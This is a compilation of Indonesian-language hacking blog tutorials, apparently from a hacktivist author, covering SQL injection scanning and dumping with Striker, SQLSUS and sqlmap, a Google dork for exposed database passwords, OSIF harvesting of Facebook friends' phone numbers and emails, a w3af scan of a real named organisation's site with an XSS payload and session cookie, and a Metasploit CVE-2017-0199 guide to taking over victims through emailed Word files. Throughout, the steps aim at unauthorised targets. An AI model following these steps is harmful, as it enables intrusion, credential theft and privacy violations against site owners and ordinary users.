Cara mencari celah web dengan Tools Strikers versi Termux

Assalamualaikum Wr.Wb
hey yo guys :v
Ketemu lagi dengan saya Mr.V4mp1r3 Gans :v

Kali ini saya akan menjelaskan tentang bagaimana
cara mencari celah SQL Injection dengan tools Stikers.

Apa itu tools strikers ?

Tools stikers adalah salah satu tools yang sering di
gunakan oleh berbagai macam hacking mulai dari newbie,sampai hacker expert,,karena tools ini adalah salah satu tools yang paling di bergunaka untuk mencari cela suatu website yang memiliki kerentanan
terhadapa SQL Injection.Alah itu aja dah itu juga klau lu baca males gw ngetik panjang lebar klau lu ngk baca akmj :v

langsung ke TKP aja Gans :v

1. Buka Termux kalian
2. masukan tools berikut ;

cd /sdcard

apt update && apt upgrade

Kloning Striker dengan perintah git
cd Striker
pip2 install -r requirements.txt
Untuk menjalankan Striker ketik perintah berikut
python2 striker.py

setalah itu kalian masukin link yang kalian ingin scan
contoh : https://wawasankuluasbanget.com/index.php
nah kalian eksekusi link nya tanpa "index.php"
contoh : https://wawasankuluasbanget.com

setelah itu tools ini akan automatis mencari celah yang rentan terhadap SQL Injection.


 



























https://camo.githubusercontent.com/b570c6179a99c423643858718df2f5f62673faed/68747470733a2f2f692e696d6775722e636f6d2f3249644a7772382e706e67

nah setalah kalian scan akan keliatan sendiri kok link yang rentan akan SQL Injection .. apabila lu sudah temukan linknya makan kalian langsung eksekusi link tersebut menggunakan sqlmap.

sekian dari saya kurang lebihnya mohon di maafkan...

salam Mr.V4mp1r3 Gans :v







Assalamualaikum Wr.Wb
Hey yo Gans :v
Apa kabar ,,,, bertemu lagi dengan saya Mr.V4mp1r3 Gans :v

Kali ini saya akan sharing tetang bagaimana cara meretas atau menghack website metode phpAdmin :v
yang kalian harus siapkan adalah ;

1. Internet yang lancar
2. Google / Crome
3. Rokok Surya & Kopi Black
4. Otak
5. Sabun

Okelah ngak usah lama lama lagi kita langsung ke TKP Gans :v

1).Pertama, masukkan dork di kotak pencarian Google


    Dork gan : filetype:ini “pdo_mysql” (pass|passwd|password|pwd)
Cara Mudah Hack Username dan Password Database Di Website

2).Maksud dari filetype:ini adalah file informasi penyimpanan database website yang akan kita hack, lalu "(pass|passwd|password|pwd)" adalah passwordnya. jadi file website atau database yang biasa disimpan berformat "application.ini, settings.ini atau config.ini". Kalian juga bisa mengganti dengan filetype:asp, filetype:php, filetype:js etc tapi dijamin gak bakalan bisa work wkwwkwkwk :D
Cara Mudah Hack Username dan Password Database Di Website

3).Setelah lu masukan memasukan dork diatas, pilih salah satu target. Tapi ingat, carilah kata-kata yang terdapat username dan password nya

4).Setelah masuk ke dalam websitenya, sobat tekan Ctrl+F pada keyboard lalu tulis "username". Contoh:
Cara Mudah Hack Username dan Password Database Di Website

5).Kemudian lu  teruskan sendiri ya wkwkwwkwk...

Sekian tutrial dari saya semoga tidak bermanfaat :v jika ada kurang tolong di maafkan dan jika ada lebihnya tolong do kembalikan gan :v
Jagan terlalu bangga dengan apa yang kalian peroleh dan jagan sombong denga apa yang telah kalian miliki.
Belajarlah sebagai pemula ,,karena jika kau belajar jadi pemula maka dunia akan terbuka lebar untukMu
#BacotAnjirr:v

#We Are D3C
#We Are Illusion
#We Are One
#We Are There Because
#We do not Forget
#We do not Forgiv
#EXPECT US !

Salam Mr.V4mpir3 

Thanks to : https://ianzcreative.blogspot.com/

Tutorial Menggunakan & Install OSIF di termux

Cara Install Dan Menggunakan OSIF Di Termux
 - Pada artikel kali ini Android Tutorialku akan memberikan tutorial cara install dan menggunakan osif di termux untuk melihat informasi penting di facebook. OSIF (Open Source Information Facebook) merupakan tool berfungsi untuk melihat data-data penting seperti email, nomor hp, dan ID facebook pada akun teman kalian. Baca juga 
Yuk simak tutorialnya Mamank.....

  • Update dan upgrade termux dengan perintah
  • $ apt update && apt upgrade
  • Karena tool ini menggunakan bahasa pemrograman python maka harus install python terlebih dahulu dengan command
  • $ apt install python2
  • Kemudian install mechanize
    $ pip2 install requests mechanize
  • Install git dengan perintah
  • $ apt install git
  • Clone tool OSIF nya dengan perintah
  • $ git clone https://github.com/CiKu370/OSIF.git
  • Masuk ke directory osif
  • $ cd OSIF
  • Install tool nya dengan perintah
  • $ pip2 install -r requirements.txt
  • Dan sekarang tinggal menjalankan tool OSIF dengan command
  • $ python2 osif.py
     
  • Login akun fb kalian dgn command
  • $ token
  • Berikut command dan keterangan yang terdapat pada tool OSIF
  • get_data => fetching all friends data 
    get_info => show information about 
    your friend dump_id => fetching all id from friend list 
    dump_phone => fetching all phone number from friend list 
    dump_mail => fetching all emails from friend list 
    token => Generate access token 
    cat_token => show your access token 
    rm_token => remove access token 
    bot => open bot menu 
    clear => clear terminal 
    help => show help 
    about => Show information about this program 
    exit => Exit the program

SQL Injection website vulnerability dengan SQLSUS di Kali Linux

SQL Injection website vulnerability dengan SQLSUS di Kali Linux 2.0


hello guys bertemu kembali bersama saya Mr.V4mp1r3
huhh udah lama sekali saya tidak menuliskan artikel 
ok tenang saja kali ini saya akan share cara menginject web yang vuln dengan menggunakan Sqlsus di Kali linux maupun linux turunan lain nya , disini saya test dengan menggunakan Kali Linux 2.0 versi ke 2
ok simak saja dan ikuti step by step nya
pertama anda buka terminal terlebih dahulu dan ketikan :
" $ sqlsus "
persis sama seperti gambar di atas
selanjutnya buat folder baru di desktop , terserah anda mau buat folder baru nya dimana saja
disini saya membuat folder baru di Desktop :
" $ cd Desktop "
" $ mkdir root " >> fungsi Mkdir ini adalah untuk membuat folder dan root nya nama folder baru tersebut , bebas nama nya terserah anda yang memberikan ^_^
" $ cd root " >> masuk ke folder baru yang tadi di buat dan ketikan sqlsus untuk membuat localhost.conf  yang fungsi nya untuk menginject website vuln ^_^ cari web vuln nya sesuai target anda masing-masing
nah kita buat dulu " .conf " contoh nama nya localhost.conf , dan disini saya memberikan nama nya 
" vuln.conf "
" $ sqlsus -g vuln.conf  " >> -g = yaitu generate configuration file > yang mana nanti nya untuk menginject suatu website vulnerability
jika sudah maka akan tersave di folder yang sebelumnya di buat yaitu folder root >> root itu nama folder saya yang berada di Desktop
buka folder tersebut yang tadi di buat yang di masukan contoh " vuln.conf "
jika anda bingung lihat gambar di bawah ini
selanjut nya cari " $ url_start " dan masukan website vuln anda
disini saya sudah menemukan website vuln ^_^ , jika masih bingung lihat gambar di bawah ini
jika target sudah di masukan di " $ url_start " kemudian jangan lupa di SAVE
jika sudah di save , kembali ke terminal dan ketikan perintah ini :
" $ sqlsus vuln.conf " >> jika save berhasil maka sqlsus akan membaca nya Loaded
hmm sukses , nah baru sekarang di inject ^_^
ketikan perintah :
" $ sqlsus> start " >> fungsi start yaitu untuk memulai , tunggu proses hingga selesai maka akan muncul database website tersebut
database sudah terlihat , dan ketikan perintah untuk mengetahui isi nya :
" $ sqlsus> get tables " >> fungsi nya untuk mendapatkan tables pada isi database web tersebut
tables sudah terlihat  dan ada banyak macam tables , disini saya akan melihat isi tables " Admin " dari website tersebut
ketikan perintah :
" $ sqlsus> get columns admin " >> fungsi nya untuk melihat isi columns pada tables admin
selanjutnya dump columns admin tersebut , ketikan :
" $ sqlsus> select * from admin "
dan hasil nya .. cukup sampai disini saja toturial nya ^_^ nanti kalau di lanjutkan berbahaya 
dan bagaimana cari halaman login admin nya ? bener-bener susah dan agak gampang :V tergantung website nya kalau login admin nya di sembunyikan aatau nama login admin nya di ubah nama nya :V seperti hal nya wordpress :V , cara mencari admin login dari mana ? gampang kok coba aja pake AdminFinder.pl atau ga contoh > www.localhost.com/admin/ atau /login/admin.php  > biasa nya itu doang kalau website yang masih default atau si programmer nya males update :v atau security web nya ga pernah update juga :V
ok cukup sekian tutorial mengenai hack website dengan SQLSUS di Kali Linux 2.0
semoga bermanfaat ya



TUTORIAL MENGGUNAKAN W3AF

W3AF Console 2007

w3af
—Overview
W3af adalah singkatan dari web audit framework. W3af pada dasarnya adalah sebuah program python yang berfungsi untuk mengaudit keamanan sebuah website.  W3af memiliki banyak plugin yang terbagi dalam serangan,misalnya: audit, mengeksploitasi, menemukan celah, bruteforce, mangle dan indentifikasi email si pemilik web. Dan artikel ini saya angkat dari sebuah blog yang diposting tahun 2007.
—Getting started
Dalam uji coba ini saya menggunakan backtrack 5, dan secara default sudah terinstall. Untuk bagian menunya bisa dilihat seperti banner diatas.
Jika anda menggunakan ubuntu, bisa langsung di ketik  sudo apt-get install w3af
Oke, saya anggap smua sudah memulai tampilan awalnya yah. disini saya mengetik help.
w3af1
Code :
1
2
3
4
5
6
7
8
9
10
11
12
13
w3af>>> help
The following commands are available:
help                You are here. help [command] prints more specific help.
url-settings        Configure the URL opener.
misc-settings       Configure w3af misc settings.
session             Load and save sessions.
plugins             Enable, disable and configure plugins.
start               Start site analysis.
exploit             Exploit a vulnerability.
tools               Enter the tools section.
target              Set the target URL.
exit                Exit w3af.
w3af>>>
—Configuration & Menentukan Target. Dalam pengujian ini, saya menggunakan web FPI sebagai target. Ingat, disini saya hanya sebatas mengujicoba tanpa ada niat lebih lanjut.
w3af2
Code:
1
2
3
4
5
6
7
8
9
10
11
12
13
w3af>>> target
 
w3af/config:target>>> help
|--------------------------------------------------------------------------------------------------|
| view | List the available options and their values. |
| set | Set a parameter value. |
|--------------------------------------------------------------------------------------------------|
| back | Go to the previous menu. |
| exit | Exit w3af. |
| assert | Check assertion. |
|--------------------------------------------------------------------------------------------------|
w3af/config:target>>> set target http://www.fpi.or.id/
w3af/config:target>>> view
Dan hasil configurasi targetnya adalah:
w3af3
—Configurasi plugin.
w3af4
Code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
w3af/config:target>>> back
w3af>>> plugins
w3af/plugins>>> help
|--------------------------------------------------------------------------------------|
| list              | List available plugins.                                          |
|--------------------------------------------------------------------------------------|
| back              | Go to the previous menu.                                         |
| exit              | Exit w3af.                                                           |
| assert            | Check assertion.                                                     |
|---------------------------------------------------------------------------------------|
| discovery         | View, configure and enable discovery plugins                      |
| output            | View, configure and enable output plugins                         |
| mangle            | View, configure and enable mangle plugins                         |
| evasion           | View, configure and enable evasion plugins                        |
| bruteforce        | View, configure and enable bruteforce plugins                     |
| audit             | View, configure and enable audit plugins                          |
| grep              | View, configure and enable grep plugins                           |
|---------------------------------------------------------------------------------------|
—Memilih Serangan
Disini saya menggunakan audit xss,xsrf,sqli.
w3af5
Code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
w3af>>> plugins
w3af/plugins>>> help
|--------------------------------------------------------------------------------------------------|
| list              | List available plugins.                                                      |
|--------------------------------------------------------------------------------------------------|
| back              | Go to the previous menu.                                                     |
| exit              | Exit w3af.                                                                   |
| assert            | Check assertion.                                                             |
|--------------------------------------------------------------------------------------------------|
| discovery         | View, configure and enable discovery plugins                                 |
| output            | View, configure and enable output plugins                                    |
| mangle            | View, configure and enable mangle plugins                                    |
| evasion           | View, configure and enable evasion plugins                                   |
| bruteforce        | View, configure and enable bruteforce plugins                                |
| audit             | View, configure and enable audit plugins                                     |
| grep              | View, configure and enable grep plugins                                      |
|--------------------------------------------------------------------------------------------------|
w3af/plugins>>> audit xss,xsrf,sqli
w3af/plugins>>> output console,htmlFile
w3af/plugins>>> output config htmlFile
Sesuai source diatas, saya menggunakan output console,htmlFile sebagai hasil dari uji coba aplikasi ini.
Perlu diketahui, bentuk serangan yang bisa kita gunakan adalah conthnya sperti ini.
w3af/plugins>>> audit xss,xsrf,sqli
atau w3af/plugins>>> audit all
Contohnya:
1
2
3
4
5
6
7
8
9
w3af/plugins>>> audit xss
w3af/plugins>>> audit
Enabled audit plugins:
xss
w3af/plugins>>> discovery webSpider,pykto,hmap
w3af/plugins>>> discovery
Enabled discovery plugins:
webSpider
pykto
Jika konfigurasinya sudah kita atur, mari kita running apa yang telah kita setting.
w3af6
Code:
1
2
3
4
5
6
7
8
9
10
w3af/plugins/output/config:htmlFile>>> view
|--------------------------------------------------------------------------------------------------|
| Setting   | Value         | Description                                                          |
|--------------------------------------------------------------------------------------------------|
| verbose   | False         | True if debug information will be appended to the report.            |
| fileName  | report.html   | File name where this plugin will write to                            |
|--------------------------------------------------------------------------------------------------|
w3af/plugins/output/config:htmlFile>>> back
w3af/plugins>>> back
w3af>>> start
—Hasil Scanning
w3af7
Code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
w3af>>> start
Auto-enabling plugin: grep.collectCookies
Auto-enabling plugin: grep.error500
Found 2 URLs and 2 different points of injection.
The list of URLs is:
- http://www.fpi.or.id/
- http://www.fpi.or.id/index.php?p=search
The list of fuzzable requests is:
- http://www.fpi.or.id/ | Method: GET
- http://www.fpi.or.id/index.php?p=search | Method: POST | Parameters: (search="")
Cross Site Scripting was found at: "http://www.fpi.or.id/index.php?p=search", using HTTP method POST. The sent post-data was: "search=<ScRIpT>alert(String.fromCharCode(vWv0))</SCriPT>&searchbtn=Cari". This vulnerability affects ALL browsers. This vulnerability was found in the request with id 18.
The web application sent a persistent cookie.
The URL: "http://www.fpi.or.id/" sent these cookies:
-  PHPSESSID=01fb079704b7a5839a303fd843e68107; Path=/
- PHPSESSID=01fb079704b7a5839a303fd843e68107; path=/
Finished scanning process.
w3af>>>
Dari hasil scanning diatas,dapat kita ketahui kalau web tersebut memiliki kelemahan pada XSS. Potensi serangan yang dapat dilakukan attacker adalah melakukan pemanggilan Get Web Shell, setelah pemanggilan web shell, maka web tersebut dapat diambil alih.
Dalam artikel ini, dengan tegas saya hanya melakukan scanning pencarian celah dan melihat potensi defacingnya tanpa ada perusakan lebih lanjut.
—Done

Tutorial menginstall Uniscan di Termux

Tutorial Install Uniscan Gnuroot Debian:

Cara Install Uniscan Web Vulnerability Scanner

  • Pertama kalian download dlu uniscannya di link ini 

       link : https://sourceforge.net/projects/uniscan/files/6.2/
  • Kali ini saya akan memberikan cara menginstall uniscan di termux
  • Next Ikuti command berikut
    $ apt update
    $ apt upgrade
    $ apt install perl
    $ apt install libmoose-perl
    $ apt install libwww-perl

  • Untuk menjalankannya, kalian tinggal ketik command dibawah ini.

    $ cd Uniscan
    $ perl uniscan.pl


Sekian dari saya semoga bermanfaat
salah GH05TM4N

Hacking Windows Just by Sending an Email

Hacking Windows Just by Sending an Email

Hacking Windows Just by Sending an Email
Hi Friends, In this post I am going to show how to hack windows just by sending an email. To make this work, we need to trick the victim to open the attachment sent via email.
In this post we are going to exploit the well known office word hta vulnerability in Microsoft Word which allows the execution of remote code when a malicious word file is opened. The Vulnerability was marked as CVE-2017-0199. There is also a metasploit module available for this and we are going to use it.
Open up your terminal and type msfconsole to start the metasploit console. Once it starts, use the metasploit module
exploit/windows/fileformat/office_word_hta.
Refer to the screenshot below.
When we lists the options, we see it does not have a payload set by default. So, we need to set up the payload first. We also need to set the other mandatory options as well.
After setting the payloads and other mandatory options, we just run the exploit. Upon running the exploit, it will create a word file named msf.doc in a location highlighted in the screenshot above.
Now, you need to send this file as an email attachment to the victim and wait for the victim to open it. Once the victim opens the file you will get a meterpreter session as shown below.
Now that you have got a meterpreter session, you are in a full control of victim’s machine. You can run whatever be the commands you want.
Let’s just drop into the victims command shell and run the command whoami.
 
 
 
Sumber :  https://www.ethicalhackingtutorials.com/

25 TOOLS TERBAIK UNTUK LINUX BAGI PEMULA

Top 25 Best Kali Linux Tools For Beginners

Becoming an Ethical Hacker is not quite as easy as to become a software developer, or programmer. An Ethical Hacker a.k.a Penetration Tester has to have a good understanding about various fields. Not just merely having in-depth programming languages in C, C++, Python, PHP, etc. Also in need is an advance Linux/Unix Environment knowledge just to get started in the field of Ethical Hacking.
  
Kali Linux comes with tons of pre-installed penetration testing tools, around about 600 tools included. As a beginner penetration tester, it sounds horrible. How could one learn or use all of those tools as a beginner? The truth is, you don’t need to master all of those, indeed, there are a lot of tools built into Kali Linux which have the same concept and purpose. But, among them, there are always the best. In this article I will cover the Top 25 Best Kali Linux tools for the beginner Penetration Tester. But if you’ve just installed Kali Linux, before you read further to this, i recommend you read here it is a good jump start into Kali.
The top 25 best Kali Linux tools I listed below, are based on functionality and also, its sequence in the Penetration Testing Cycle or procedure. If you have already followed along my earlier article in the Penetration Testing Cycle section, there are basically four procedures: Reconnaissance, Scanning, Exploitation and Post-Exploitation. Here I listed bottom to top best 25 Kali Linux tools, starting from Anonymity.

ANONYMITY

During penetration testing, it is crucial to prepare to stay anonymous. Don’t fool yourself by revealing your own identity while hacking, cover it!

25. MacChanger

There are several reasons changing the MAC address is important, I use MacChanger while pentesting a wireless network with MAC filtering enabled and have to assign an approved MAC address to the wireless adapter. Or just literally to change to a random MAC while pentesting. To use MacChanger, follow this command pattern:
~$ macchanger [options] networkDevice
 
The options are:
 
  -h,  --help                   Print this help
  -V,  --version                Print version and exit
  -s,  --show                   Print the MAC address and exit
  -e,  --ending                 Don't change the vendor bytes
  -a,  --another                Set random vendor MAC of the same kind
  -A                            Set random vendor MAC of any kind
  -p,  --permanent              Reset to original, permanent hardware MAC
  -r,  --random                 Set fully random MAC
  -l,  --list[=keyword]         Print known vendors
  -b,  --bia                    Pretend to be a burned-in-address
  -m,  --mac=XX:XX:XX:XX:XX:XX
       --mac XX:XX:XX:XX:XX:XX  Set the MAC XX:XX:XX:XX:XX:XX
For example, i use my WLAN1 device to connect to the network, to change the default WLAN1 MAC address fully random, i type the command:
~$ macchanger -r wlan1

24. ProxyChains

Proxychains cover and handle whatever job. Add command “proxychains” for every job, that means we enable Proxychains service. For example i want to trigger ProxyChain to cover NMAP. The command is:
~$ proxychains nmap 74.125.68.101 -v -T4
But, before you use ProxyChains, you need to configure it first, adding proxy IP and other things, see full tutorial about ProxyChains here: https://linuxhint.com/proxychains-tutorial/

INFORMATION GATHERING

23. TraceRoute

Traceroute is a computer network diagnostic tool for displaying the connection route and measuring transit delays of packets across an IP network.

22.WhatWeb

WhatWeb is a website fingerprint utility. It identifies websites including content management systems (CMS), blogging platforms, statistic/analytic packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1700 plugins, each to recognize something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.

21. Whois

WHOIS is a database managed by local internet registrars, it is a query and response protocol that is widely used for querying databases that store the registered users of an Internet resource, such as a domain name or an IP address block, but is also used for a wider range of other personal information about the domain owner.

20. Maltegoce (Maltego Community Edition)

Maltegoce is an intelligence gathering tool which aims to discover and collect data about the target (company or personal) and visualizes that collected data into graph for analysis. Before we are using maltegoce, first register an maltego community edition here : https://www.paterva.com/web7/community/community.php
Once your done registering, now open the terminal and type “maltegoce”. wait a brief moment for it to startup. After it finishes loading, you will be greeted by a screen asking you to login to Maltego Community Edition.

Sign in with the account you’ve just registered. After you are logged in you need to decide what type of “machine” is needed to run against the target.
  • Company Stalker (gathers reconnaisance)
  • Footprint L1 (basic reconnaisance)
  • Footprint L2 (moderate amount of reconnaisance)
  • Footprint L3 (intense and the most complete reconnaisance)

Let’s choose L3 footprint.

Enter the target domain name.

The result should look like that, it display whatever found, and visualize it in graph.

19. NMAP

Network Mapper (NMap) is a tool used for network discovery and security auditing. My favorite option in NMAP is “–script vuln” it tells NMAP to audit the security of each open port on target using NSE. For example:
~$ nmap kali.org --script vuln
To view full list of NMAP features, see the help page instead.
~$ nmap --help

18. Dirbuster / Dirb

Dirb is a tool to find hidden objects, files and directories on a website. Dirb works by launching a dictionary based attack against a web server and analyzing the response. DIRB comes with a set of preconfigured wordlists, located under /usr/share/dirb/wordlists/. To launch dirb, use the following command pattern:
~$ dirb [TARGET] [WORDLISTS_FILE]
~$ dirb http://www.site.com /usr/share/dirb/wordlists/vulns/apache.txt

VULNERABILITY ANALYSIS

17. Nikto

Nikto is webserver and web application assessment tool to find potential security issues and vulnerabilities. Nikto scans for 6700 potentially dangerous files/programs. To run Nikto, type following command:
~$ nikto -h [hostname or IP address]

WEB APPLICATION ANALYSIS

16. SQLiv


SQLiv is a simple and massive SQL injection vulnerability scanner. SQLiv is not installed by default in Kali Linux. To install it, run the following commands:
~$ cd sqliv &amp;amp;amp;amp;&amp;amp;amp;amp; sudo python2 setup.py -i
Once installed, just type in the terminal:
~$ sqliv -t [TARGET_URL]

15. BurpSuite

Burp Suite is a  collection of tools bundled into a single suite which performs security testing of web applications, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. The main features of Burpsuite is that it can function as an intercepting proxy (see image below). Burpsuite intercepts the traffic between a web browser and the web server.

To open burpsuite, type “burpsuite” into the terminal.

14. OWASP-ZAP


OWASP ZAP is a Java-based tool for testing web app security. It has an intuitive GUI and powerful features to do such things as fuzzing, scripting, spidering, proxying and attacking web apps. It is also extensible through a number of plugins. In this way, it is an all-in-one web app testing tool.
To open OWASP ZAP, type “owasp-zap” into the terminal.

13. HTTRACK

Httrack is a website / webpage cloner, from a penetration testing perspective, it is mainly used to create a fake website, or phising in attacker server. Run httrack wizard by typing in the terminal :
~$ httrack
You will be prompted, some configuration needed with guidance. Such as, Project name, Base path of the project, set the  URL target and the proxy configuration.

12. JoomScan & WPScan

JoomScan is a Web application analysis tool to scan and analyze Joomla CMS, while WPScan is a WordPress CMS vulnerability scanner. To check what CMS is installed on a target website, you can use either ONLINE CMS Scanner, or using additional tools, “CMSMap”. (https://github.com/Dionach/CMSmap). Once you know the target CMS, whether it is Joomla or WordPress, then you can decide to  use JoomsScan or WPScan.
Run JoomScan:
~$ joomscan -u victim.com
Run WPScan:
~$ wpscan -u victim.com



DATABASE ASSESSMENT

11. SQLMap

SQLMAP automates the process of detecting and exploiting SQL injection vulnerabilities and taking over databases. To use SQLMap, you need to find a website URL which is SQL injection vulnerable, you can find it by either using SQLiv (see list number) or using Google dork. Once you’ve got the vulnerable SQL injection URL, then open the terminal and run the following command pattern:
  1. Acquire databases list
    ~$ sqlmap -u "[VULN SQLI URL]" --dbs
  2. Acquire tables list
    ~$ sqlmap -u "[VULN SQLI URL]" -D [DATABASE_NAME] --tables
  3. Acquire columns list
    ~$ sqlmap -u "[VULN SQLI URL]" -D [DATABASE_NAME] -T [TABLE_NAME] --columns
  4. Acquire the data
    ~$ sqlmap -u "[VULN SQLI URL]" -D [DATABASE_NAME] -T [TABLE_NAME] -C [COLUMN_NAME] --dump
For example, let’s say we have vulnerable SQL injection, it is http://www.vulnsite.com/products/shop.php?id=13. And we’ve already acquired the databases, tables and columns. If we want to acquire the data, then the command is:
~$ sqlmap -u "http://www.vulnsite.com/products/shop.php?id=13" -D vulnsiteDb -T vulnsiteTable -C vulnsiteUser --dump
Mostly, the data is encrypted, we need another tool to decrypt it. Below is another procedure to get the clear text password.

PASSWORD ATTACKS

10. Hash-Identifier and findmyhash

Hash-identifier is a tool to identify the different types of hashes used to encrypt data and especially passwords. Findmyhash is a tool to crack encrypted passwords or data using online services. For example we got encrypted data:  098f6bcd4621d373cade4e832627b4f6. First thing you are going to need to do is identify the hash type. To do that, launch “hash-identifier” in terminal, and input the hash value on it.

Hash-identifier detected this decrypted data is using hash algorithm MD5. After its hash type is known, then we use another tool, findmyhash to crack the data. Now, type in the terminal:
~$ findmyhash MD5 -h 098f6bcd4621d373cade4e832627b4f6
The result would be like this:

9. Crunch

Crunch is a utility to create custom wordlists, where you can specify a standard character set or a character set you specify. crunch can generate all possible combinations and permutations.
The basic syntax for crunch looks like this:
~$ crunch <min> max<max> <characterset> -t <pattern> -o <output filename>
Now, let’s go over what’s included in the syntax above.
    • min = The minimum password length.
    • max = The maximum password length.
    • characterset = The character set to be used in generating the passwords.
    • -t <pattern> = The specified pattern of the generated passwords. For instance, if you knew that the target’s birthday was 0231 (February 31st) and you suspected they used their birthday in their password, you could generate a password list that ended with 0231 by giving crunch the pattern @@@@@@@0321. This word generate passwords up to 11 characters (7 variable and 4 fixed) long that all ended with 0321.
    • -o <outputfile> = save the wordlist into a file name given.

8. John The Ripper (OFFLINE PASSWORD CRACKING SERVICE)

John The Ripper is one of the most popular password testing and cracking programs as it combines a number of password crackers into one package, auto-detects password hash types, and includes a customization cracker. In Linux, “passwd” file located at /etc/passwd contains all user information. hash SHA encrypted password of each of the users found is stored in /etc/shadow file.

7. THC Hydra (ONLINE PASSWORD CRACKING SERVICE)

Hydra is the fastest network login cracker which supports numerous attack protocols. THC Hydra supports these protocols: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
For more depth and detail tutorial about hydra visit my previous article titled Crack Web Based Login Page With Hydra in Kali Linux (https://linuxhint.com/crack-web-based-login-page-with-hydra-in-kali-linux/)



Sumber : https://linuxhint.com/top-25-best-kali-linux-tools/